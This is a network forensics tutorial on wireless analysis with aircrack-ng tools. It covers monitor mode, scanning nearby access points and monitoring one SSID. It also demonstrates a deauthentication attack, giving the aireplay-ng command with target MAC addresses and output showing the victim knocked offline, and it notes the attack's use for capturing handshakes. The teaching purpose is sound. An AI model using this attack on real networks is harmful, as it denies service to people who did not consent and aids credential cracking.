Digital forensics

Wireless analysis

January 19, 2021 by

In this article, we will discuss how to perform wireless analysis, specifically on Wi-Fi networks. We will perform active packet capturing by using an external Wi-Fi card to understand how to identify information by capturing and analyzing 802.11 management traffic.

This information commonly includes:

  • Broadcast SSIDs
  • Access point MAC addresses
  • Supported encryption/authentication algorithms
  • Associated client MAC addresses

Learn Network Forensics

Learn Network Forensics

Get hands-on experience analyzing logs, protocols, wireless, web traffic and email for traces left behind by attackers.

Monitoring traffic using aircrack-ng suite of tools

Aircrack-ng suite of tools is the most popular free suite of tools available for Wi-Fi security assessments, and it is worth understanding how some of these tools are used for wireless analysis. Moreover, these tools are commonly used by penetration testers.

Regardless of the tools used, it is important to know how to analyze the 802.11 traffic in order to understand some of the important aspects such as who is broadcasting the packets and who is connected to a specific access point.

Check the wireless interfaces available

We are going to use an external Wi-Fi card using USB on a Linux virtual machine. Kali Linux is the virtual machine in this case. The following output of iwconfig command shows the available wireless interfaces on the machine.

# iwconfig

wlan0     IEEE 802.11  ESSID:off/any  

          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   

          Retry short  long limit:2   RTS thr:off   Fragment thr:off

          Encryption key:off

          Power Management:off

eth0      no wireless extensions.

lo        no wireless extensions.

wlan0 is the available wireless interface in this case.

One of the first steps to be able to capture Wireless network traffic is to put the wireless card in monitor mode. The command airmon-ng start wlan0 can be used to do it.

# airmon-ng start wlan0

PHY Interface Driver Chipset

phy0 wlan0 rt2800usb Ralink Technology, Corp. RT3572

(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)

(mac80211 station mode vif disabled for [phy0]wlan0)

As we can see in the preceding excerpt, the wireless card is now kept in monitor mode. The new interface that is in monitor mode is wlan0mon in this case.   

Scanning for the surrounding Wi-Fi access points

Once the wireless card is put in monitor mode, we can start scanning the surrounding networks that are within the range. This can be done using the following command.

#airodump-ng wlan0mon

Following is the output of the preceding command. 

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                                                                                                                                     

 AC:E4:31:24:C4:93  -37       12        2    0  11  130  WPA2 CCMP   PSK  Garauyu_2.4G                                                                   

 88:54:FE:32:2F:CE  -42       14        0    0   7  270  WPA2 CCMP   PSK  darksnade                                                                          

 78:62:8A:37:D2:B4  -49       12        0    0   5  130  WPA2 CCMP   PSK  ninja                                                                         

 50:62:C1:2B:C5:8D  -49       24        1    0   5  195  WPA2 CCMP   PSK  partytime

The preceding excerpt shows the list of access points available within the wireless card’s range, the channels the access points are on, the mac addresses and the type of encryption they are configured with. Following are the details from the preceding example.

  • The column BSSID shows the mac address of the access point.
  • ESSID shows the SSID (service set identifier) of the access point.
  • ENC column shows the encryption used, which is WPA2 in this case for all access points.
  • CH column shows the channel the access point is on. 

Monitoring a specific SSID

Clearly, the example shown earlier lists all the access points within the range of our wireless card. If there is a scenario, where we are interested in monitoring a specific access point, we can use the flag --essid and specify the ssid. This looks as follows.

#airodump-ng --essid "partytime" wlan0mon

The output of this command looks as follows.

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                                                                                                                                      

 50:62:C1:2B:C5:8D  -47        6       18    8   5  195  WPA2 CCMP   PSK  partytime                                                                                                                                                                                                                                                             

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                                                                                                                 

 50:62:C1:2B:C5:8D  E6:23:0E:4B:2B:FD  -14    0 -24    338      116   

As we can see in the preceding excerpt, the output contains only one access point named partytime.  As we can notice, this access point is on channel 5. There are 11 channels routers can broadcast their signals on. These channels range from 1 to 11. The mac address under the column STATION is of the client device that is connected to the access point. 

Set wireless card in a specific channel

There can be scenarios where the wireless card needs to be on the same channel as the target access point. For instance, an attacker wants to perform a deauthentication attack on a specific victim. This means, the attacker sends packets on behalf of the router to the victim and the victim will be disconnected from the access point. The card can be put on a specific channel using airmon-ng utility as shown below.

# airmon-ng start wlan0 5

The preceding command starts monitor mode on the interface wlan0 and the card will be on channel 5. Once the card is in the same channel as the router, an attacker can start sending deauthentication packets to the victim in order to disconnect the victim. The following command can be used to achieve this.

aireplay-ng --deauth 0 -c [DEVICES MAC ADDRESS] -a [ROUTERS MAC ADDRESS] wlan0mon

The 0 represents an unlimited amount of deauth packets. 

  • -c is the client’s mac address we are targeting.
  • -a is the mac address of the router.
  • wlan0mon is the name of the network card that is in monitor mode.

Following is the output of the preceding command.

# aireplay-ng --deauth 0 -c E6:23:0E:4B:2B:FD -a 50:62:C1:2B:C5:8D wlan0mon

09:37:33  Waiting for beacon frame (BSSID: 50:62:C1:2B:C5:8D) on channel 5

09:37:34  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|53 ACKs]

09:37:35  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|59 ACKs]

09:37:36  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|58 ACKs]

09:37:37  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|57 ACKs]

09:37:38  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|58 ACKs]

09:37:39  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [31|63 ACKs]

09:37:39  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [16|55 ACKs]

09:37:40  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|52 ACKs]

09:37:41  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|54 ACKs]

09:37:41  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|54 ACKs]

09:37:42  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|51 ACKs]

At this point of time, the victim gets disconnected from the router. This attack can cause denial of service on the victim.

Additionally, this can be useful when an attacker wants to capture the four-way handshake while a station is connecting to the access point. Understanding wireless attacks is probably one of the key requirements to understand how to investigate wireless attacks.

Learn Digital Forensics

Learn Digital Forensics

Build your skills with hands-on forensics training for computers, mobile devices, networks and more.


Having an external Wi-Fi card is one of the key aspects of active wireless sniffing and analysis. This article has demonstrated how one can use an external wireless card to actively capture and understand wireless traffic.

We used some of the tools from aircrack-ng suite of tools. We have also discussed how one can perform a deauthentication attack using aireplay-ng.



Network Forensics, Ric Messier

Internet Forensics: Using Digital Evidence to Solve Computer Crime, Robert Jones

Network Forensics: Tracking Hackers through Cyberspace, Sherri Davidoff


Srinivas is an Information Security professional with 4 years of industry experience in Web, Mobile and Infrastructure Penetration Testing. He is currently a security researcher at Infosec Institute Inc. He holds Offensive Security Certified Professional(OSCP) Certification. He blogs Email: